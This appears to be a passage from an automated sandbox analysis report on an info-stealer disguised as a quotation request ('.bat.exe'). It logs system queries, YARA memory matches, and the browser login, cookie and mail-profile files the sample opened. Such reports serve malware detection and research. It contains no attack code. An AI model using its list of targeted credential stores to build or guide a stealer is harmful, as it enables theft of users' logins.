Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Queries volume information: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe VolumeInformation
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Queries volume information: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Queries volume information: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match File source: 00000009.00000002.4517923303.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.4517414324.0000000003091000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.2115396182.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe PID: 4408, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe PID: 5268, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: jnqeRRexnD.exe PID: 6448, type: MEMORYSTR
Source: Yara match File source: 14.2.jnqeRRexnD.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000E.00000002.4514729893.0000000000435000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2115396182.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe PID: 4408, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: jnqeRRexnD.exe PID: 6448, type: MEMORYSTR
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: Yara match File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000E.00000002.4517414324.0000000003198000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2115396182.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe PID: 4408, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe PID: 5268, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: jnqeRRexnD.exe PID: 6448, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: 00000009.00000002.4517923303.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.4517414324.0000000003091000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.2115396182.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe PID: 4408, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe PID: 5268, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: jnqeRRexnD.exe PID: 6448, type: MEMORYSTR
Source: Yara match File source: 14.2.jnqeRRexnD.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000E.00000002.4514729893.0000000000435000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2115396182.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe PID: 4408, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: jnqeRRexnD.exe PID: 6448, type: MEMORYSTR